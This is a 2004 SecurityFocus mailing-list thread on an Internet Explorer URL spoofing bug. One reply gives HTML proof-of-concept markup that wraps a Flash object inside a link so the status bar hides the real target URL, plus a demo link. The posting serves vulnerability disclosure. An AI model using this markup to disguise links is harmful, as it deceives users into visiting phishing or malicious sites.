SecurityFocus

Re: New URL spoofing bug in Microsoft Internet Explorer Nov 08 2004 11:30PM
roozbeh afrasiabi (roozbeh_afrasiabi yahoo com) (1 replies)

In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@oemcomputer>

Here is another way of spoofing the status bar:

<a> tag + <object> tag

<!--A HREF=http://www.yahoo.com><!--OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"

codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflas
h.cab#version=6,0,0,0"

WIDTH="300" HEIGHT="50" id="link" ALIGN="">

<PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > <PARAM NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu

VALU=FALSE>

<EMBED src="link.swf" quality=high bgcolor=#FFFFFF WIDTH="300" HEIGHT="50" NAME="link" ALIGN=""

TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>

</a></OBJECT></a>

*this method of spoofing the status bar allows malicious users to hide the target url from suspecting ppl ,demo page uses flash to generate

random urls.

demo:

http://www.persiax.com/pocs/statusbar/status.htm

[ reply ]

Re: New URL spoofing bug in Microsoft Internet Explorer Nov 16 2004 04:11PM
q q (systemcracker gmail com) (1 replies)

Re: New URL spoofing bug in Microsoft Internet Explorer Nov 17 2004 05:55AM
GuidoZ (uberguidoz gmail com)